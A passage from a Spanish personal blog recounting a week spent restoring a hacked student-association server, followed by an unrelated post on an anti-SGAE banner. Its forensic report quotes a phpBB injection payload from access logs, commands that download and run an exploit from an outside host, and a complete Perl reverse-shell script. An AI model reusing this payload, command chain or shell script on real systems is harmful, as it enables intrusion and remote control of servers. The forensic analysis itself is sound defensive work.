• Por supuesto, siguiendo la ley de Murfy, la tabla que necesitaba para la web del congreso no está en el volcado.
• Yujuuuuu!
• (Maldiciones varias censuradas para el público)
• Bajo a Euri y meto los discos duros en el nuevo ordenador de euri, a ver si los puedo montar y recuperar la tabla que me falta y dejarlos así para ir recuperando cosas.
• El ordenador no arranca del CD. Limpio el CD. nada. Limpio el CD. Empieza a leerlo, muestra la pantalla de ubuntu, y casca al seguir tratando de leer. No me creo que un puto ordenador nuevo con una regrabadora de DVD no pueda leer el puto CD
• Me cago en mi mala suerte.
• Me cago en mi estampa.
• Busco otro lector de CDs por el garito. No encuentro ninguno suelto. Desmonto el de un ordenador por ahí tirado y lo pongo en el nuevo. No funciona tampoco: este lectos ni siquiera abre la bandeja
• Se me hacen las putas 22:30 en la escuela.
• Abandono y mañana seguiré con ello.
• Como por la noche me aburro, sigo con el tema.
• Tenía una copia del /var/lib/mysql en el disco duro externo.
• Me hago con unos paquetes deb de la misma versión que la DB de cero, y con los binarios tras algo de sudor logro hacer un dump (esta vez sin errores de las bases de datos)
• Restauro la web del congreso (una versión antigua del diseño, aunque el contenido es de DB y no se ha perdido nada) y la web de eurielec.
• Corrijo varios errores a raíz del nuevo PHP y nueva versión de mysql instaladas.

Las cosas empiezan a funcionar: Miércoles

• Me echan un cable y ponen en el nuevo ordenador un lector de CDs decente.
• Arranco con el CD de Ubuntu, monto todo intentando aclararme de qué partición es cada cosa.
• Restauramos el correo de forma provisional, copiando los .procmailrc’s y .forward de cada uno al server de correo (uno) para que guarde el correo en el /home local, pero lo haga bien, y reenviando los mensajes que la gente se quiere enviar fuera.
• Llega el momento de copiar los datos al nuevo servidor. Me doy cuenta que lo mejor va a ser copiarlo por NFS, y la Ubuntu no trae nfs en el disco de instalación.
• Tuesto una Gentoo minimal, que en 60 megas tiene de todo, incluído server nfs, ssh y demás.
• Vuelvo a montar todo, y empiezo a copiar los homes (un tar de 38 gigas, ahí es nada).
• Acaba ya muy tarde, y copio otras cosas (los crontabs, el /etc, los scripts y programas personalizados de la asociación, etc…)
• Restauramos todo salvo los jomes, que cuando estén hay que juntar las carpetas de correo antiguas con el nuevo correo que ha ido llegando.
• Ya en casa sigo restaurando aplicaciones web, con sumo cuidado (pues sospechamos que la entrada fue via web, y se hicieron root con el local root exploit recientemente encontrado en el kernel).
• Empezamos a restaurar los blogs.
• Me doy cuenta que la he cagado con los homes. Estaban en RAID 1, con dos discos en paralelo con copias idénticas, para que si uno falla no se pierda la información. Desgraciadamente una de las particiones había dado un error, y cuando pasa eso, linux automáticamente saca la partición de array raid (se deja de usar), y por lo tanto se queda con información antigua.
• ¿Adivináis de qué partición había recuperado los homes?
• De la que estaba con información antigua. Bueno, habrá que volverlos a copiar mañana

Venga que ya queda poco: Jueves

• Copio los homes buenos al servidor (Otros 39 gigas de tar, y luego descomprimirlo).
• Ya por la tarde todo parece listo para restaurar los homes:
  • Renombro los public_html, para que todo el mundo revise que aplicaciones web tiene instaladas allí.
  • Quitamos los directorios .ssh, que han podido ser comprometidos
  • Paramos el servidor de correo, añadimos el correo nuevo recibido a las carpetas antiguas, y volvemos a montar los homes en el servidor de correo. Despues arrancamos el servidor de correo.
• El resto de máquinas del garito vuelven a montar los homes y a estar operativas.

Relax: Viernes

• Empiezo a recibir millones de agradecimientos por el curro de estos días en mi correo.
• Restauramos lo que vamos viendo que falta, aplicaciones, las bases de datos bajo demanda.
• Ponemos a funcionar de nuevo los blogs, y yo empiezo a probar el wordpress.
• Curro mucho mucho en la Beca.
• Unos pocos nos vamos de tapeo, que a pesar de los exámente aún hay gente que se anima.

Día en familia + hacking: Sábado

• Paso un tranquilo día en familia.
• Por la noche, entre los múltiples cafés del día, el haber dormido hasta muy tarde, y que soy un vampiro y duermo muy poco, me pongo a hacer análisis forense del servidor, aburrido de dar vueltas en la cama.
• A las 7:54am envío el report del análisis forense, contento de haber encontrado las pistas para saber cómo y por donde entraron:
  

  	
  Parece que la controladora del nuevo ordenador es algo mejor que la del
  antiguo cero, y no se cuelga leyendo de disco, aunque tenga sectores
  chungos como pasaba con la máquina física de cero.
  Con dd conv=noerror he sacado una copia de toda la partición var de
  cero, y he recuperado ficheros con las reiserfsck –rebuild-tree -S.
  	
  Así he recuperado varias cosillas, la mayoría dañadas por que se trasteó
  demasiado con la partición en vez de apagar el equipo.
  	
  Pero lo mejor de todo es:
  	
  201.0.138.5 - - [15/Jan/2005:18:50:44 +0100]
  “GET /viewtopic.php?t=10&highlight=%2527%252esystem(chr(101)%
  252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(73)%
  252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(59)%
  252echr(105)%252echr(100)%252echr(59)%252echr(117)%252echr(110)%
  252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%
  252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%
  252echr(111)%252echr(32)%252echr(70)%252echr(73)%252echr(77))%252e%2527
  HTTP/1.1″ 404 301 “-” “Linux”
  	
  Traducción una vez convertidos los caracteres unicode e interpretado el
  código php:
  	
          echo INICIO;id;uname -a;echo FIM
  	
  Todas las entradas similares que he encontrado son (ya traducidas):
  	
  Desde: 201.0.138.5      (201-0-138-5.dial-up.telesp.net.br)
  [15/Jan/2005:18:50:44 +0100]    echo INICIO;id;uname -a;echo FIM
  [15/Jan/2005:18:54:06 +0100]    echo INICIO;id;uname -a;echo FIM
  	
  Desde: 81.196.69.192    (81-196-69-192.constanta.cablelink.ro)
  [16/Jan/2005:17:12:16 +0100]    uname -a;id;pwd;
  	
  Desde: 213.174.51.72    (k043.ims-firmen.de)
  [16/Jan/2005:06:07:15 +0100]    echo INICIO;id;uname -a;echo FIM
  [16/Jan/2005:06:11:03 +0100]    echo INICIO;lwp-download -a
  http://geocities.yahoo.com.br/dominusvis/xpl/cb.txt /tmp/cb;echo FIM
          Yupieeeeeeee!! aquí se baja el exploit!
  [16/Jan/2005:06:12:57 +0100]    echo INICIO;perl /tmp/cb 200.191.250.34
  21;echo FIM
          Y aquí lo ejecuta…
  [15/Jan/2005:05:21:19 +0100]    echo INICIO;id;uname -a;echo FIM
  [15/Jan/2005:06:10:38 +0100]    echo INICIO;id;uname -a;echo FIM
  	
  El cb ese es un script cutre y salchicero para poner una shell en el
  puerto 21:
  	
  —————————————————————-
  #!/usr/bin/perl
  use strict;
  use Socket;
  	
  #———————————————————>
  #
  #             Infektion Group Back Shell
  #       Codigo baseado no artigo sobre sockets
  #   escrito por Rahul Chauhan : www.devshed.com e no bsh
  #              escrito por Shellc0de :)
  #
  #                                       Obrigado a todos!
  #
  #            <escrito por Dominus Vis>
  #
  #———————————————————>
  	
  if(@ARGV < 2){ die("Uso: $0 ip portan"); }
  	
  # inicializa alvo e porta
   my $host = shift || $ARGV[0];
   my $port = shift || $ARGV[1];
   my $proto = getprotobyname(’tcp’);
  	
  # pega o endereço da porta
   my $iaddr = inet_aton($host);
   my $paddr = sockaddr_in($port, $iaddr);
  	
  # cria o socket e conecta ao alvo
   socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die “socket: $!";
   connect(SOCKET, $paddr) or die “connect: $!";
   if(fork() == 0){ #cloca o processo ativo
    open(STDIN, “>&SOCKET");
    open(STDOUT, “>&SOCKET");
    open(STDERR, “>&SOCKET");
    system("/bin/sh -i"); #executa /bin/sh -i no alvo!
    close(STDIN);
    close(STDOUT);
    close(STDERR); }
  —————————————————————-
  	
  Lo que no me queda claro es si lograron entrar por ahí, o tendrían que
  lanzar más comandos, por que en el puerto 21, ejecutándose como www-data
  no creo que pudieran poner una shell (y deberían saberlo, que para eso
  lanzan el id…
  	
  Luego debieron ponerlo en el puerto del irc, que no requiere ser root,
  entrar como www-data y hacerse root con el bug del kernel que salió
  anunciado recientemente.
  	
  La web http://geocities.yahoo.com.br/dominusvis/ es de lo más cutre, con
  unos cuantos scripts para poner de página web y ejecutar comandos en
  remoto (las imagenes tb son scripts, no imágenes reales, supongo que
  para que geocities no les añada la publicidad chunga) y unas cuantas
  aplicaciones de tipo scanner para windozes….
  	
  Por cierto, 213.174.51.72 es una máquina linux, con 3246 días de uptime
  (aunque se puede fakear), y burradas como tener el mysql abierto. Debía
  ser también hackeable, y supongo que nuestros amigos brasileños la
  usaron de pasarela (lo de FIM, FIN en brasileño les delata un poco):
  	
  Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2005-01-23 07:23
  CET
  Interesting ports on k043.ims-firmen.de (213.174.51.72):
  (The 1627 ports scanned but not shown below are in state: closed)
  PORT     STATE    SERVICE
  7/tcp    filtered echo
  11/tcp   filtered systat
  15/tcp   filtered netstat
  19/tcp   filtered chargen
  21/tcp   open     ftp
  22/tcp   open     ssh
  25/tcp   open     smtp
  67/tcp   filtered dhcpserver
  69/tcp   filtered tftp
  79/tcp   filtered finger
  80/tcp   open     http
  111/tcp  filtered rpcbind
  119/tcp  filtered nntp
  135/tcp  filtered msrpc
  137/tcp  filtered netbios-ns
  138/tcp  filtered netbios-dgm
  139/tcp  filtered netbios-ssn
  443/tcp  open     https
  445/tcp  filtered microsoft-ds
  515/tcp  filtered printer
  617/tcp  filtered sco-dtmgr
  901/tcp  filtered samba-swat
  1214/tcp filtered fasttrack
  1248/tcp filtered hermes
  1433/tcp filtered ms-sql-s
  1434/tcp filtered ms-sql-m
  2001/tcp filtered dc
  2002/tcp filtered globe
  3306/tcp open     mysql
  4660/tcp filtered mosmig
  6346/tcp filtered gnutella
  6699/tcp filtered napster
  Device type: general purpose
  Running: Linux 2.4.X|2.5.X
  OS details: Linux Kernel 2.4.0 - 2.5.20
  Uptime 3.246 days (since Thu Jan 20 01:29:25 2005)
  	
  No, el puerto 21 es un ftp normal, no una shell… que ha sido lo
  primero que he probado.  :)))
  	
  Estoy por denunciar la primera IP de todas al proveedor, a ver si les
  hacen algo, por que tenía pinta de no ser un server que ya hubieran
  hackeado.
  	
  Saludosssssssssssssss!
  	
  –
   !)     bisho! -=] 23/01/2005 [=-
  !  ‘,  _
   !   ) ·>
    ?     )  ::    Don’t promote SW Monopolies. Say NO to software      ::
  ,???—’   ::                         patents                         ::
  [ PEACE ]  ::            EuropeSwPatentFree Demostration:             ::
      ……::                  http://online-demo.org                  ::
  

Como se ve, la semana pasada fueron unos días para olvidar. Estrés, agobio, y mucho mucho curro.

Después de todo te queda una sensación agria, y mucho desprecio para las personas que se dedican a joder servidores ajenos. Encima en este caso por un supuesto grupo en contra del “racismo” y la “guerra", que luego emplea la misma guerra, cibernética, pero guerra, y todo sin consideraciones de ningún tipo, por que si se hubieran fijado habrían visto muestras del papel activo de nuestra asociación contral la guerra.

Bueno, ya pasó, y esa despreciable gente no se merece ni un minuto más de nuestro tiempo.

Javier de la Cueva ha hecho un llamamiento esta mañana para que la gente le envíe banners contra el canon de la SGAE. Chema que sabe que me gusta esto del diseño y que soy fácil de picar y enmarronar me ha enviado un email comentándolo y lo ha puesto en su blog, así que aquí va mi propuesta:

Para crearlo he usado el genial programa de retoque fotográfico Gimp, que facilita mucho la tarea, y tiene la posibilidad de “comprimir” los gifs animados, eliminando información redundante entre frame y frame de la animación, dejando así este banner de 33 frames ¡en sólo 49 Kbytes!. Los ficheros Gimp originales empleados los puedes descargar aquí y me adhiero a la licencia elegida por Chema, la de Atribución de Creative Commons.

¿Por qué hay gente que no se entera? ¿Por qué hay gente que se empeña en negar sus derecho?

En España los usuarios tienen por ley pueden ejercer derecho a